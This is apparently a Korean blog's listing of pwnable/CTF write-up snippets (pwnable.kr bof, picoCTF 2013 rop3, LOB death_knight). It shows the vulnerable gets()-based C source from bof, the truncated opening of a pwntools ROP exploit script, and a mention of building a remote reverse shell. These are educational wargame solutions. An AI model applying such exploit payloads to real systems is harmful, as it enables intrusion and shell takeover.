PWN(13)
-
dreamhack.io - seccomp
보호되어 있는 글입니다.
2021.07.31 -
dreamhack.io - cpp_smart_pointer_1
보호되어 있는 글입니다.
2021.07.29 -
pwnable.kr - bof
세번째 pwnable.kr 문제풀이군요.중간중간에 다른문제들 풀다와서 풀이가 많이 느린 것 같습니다 :) 먼저 문제를 확인하면 소스코드하고 파일 하나를 주는군요. 12345678910111213141516171819#include #include #include void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe){ system("/bin/sh"); } else{ printf("Nah..\n"); }}int main(int argc, char* argv[]){ func(0xdeadbeef); return 0;} Colored by Color Sc..
2018.08.19 -
[pico CTF 2013] rop3
pico CTF Rop3번문제 (grin) 취약점 분석! 똑..같다 ㅎ하지만 이번에는 shell을 직접 띄어줘야한다 ㅠㅠ 저번에푼rop공룡같이 풀어본다!! 123456789101112131415161718192021222324252627282930313233from pwn import * r = process("./rop3") payload = ""read_plt = 0x08048360read_got = 0x0804a000write_plt = 0x080483a0shell = "/bin/sh"bss = 0x0804a020offset = 0x9ad60pppr = 0x804855d payload += "A"*140payload += p32(read_plt) + p32(pppr) + p32(0) + p32(bs..
2018.08.16 -
LOB ALL CLEAR
앗..드뎌 올클이다!
2018.08.03 -
LOB - 20. xavius -> death_knight
드뎌 LOB마지막 문제입니다! 이번문제 진짜삽질 많이했어요...후...이게 그냥 익스였으면 삽질 조금만하고 풀 수 있었겠지만..원격으로 익스하는거라 리버스쉘 찾는데 삽질..로컬이아닌 외부 서버 리눅스로 하면서 삽질...ip부분이 lob의 ip인지 제 우분투ip인지 삽질..이렇게저렇게 하긴했는데 많이 연습해야 할 것 같네요 ㅎㅎ 소스코드를 봅시다! 윗부분은 거의다 서버여는 코드같고 아랫부분만 bof가 일어나는 부분이군요 저부분을 그냥 익스한다면 인자값이 들어가는위치 찾아서하면 간단하겠지만,소켓통신으로 서버를 열기때문에 무작위로 대입해줘야할 것 같습니다!파이썬 코드는 http://blog.c2w2m2.com/22 코드를 많이 참고하였습니다! 리버스 쉘코드는 아래 링크를 참고해주세요!http://shell-s..
2018.08.03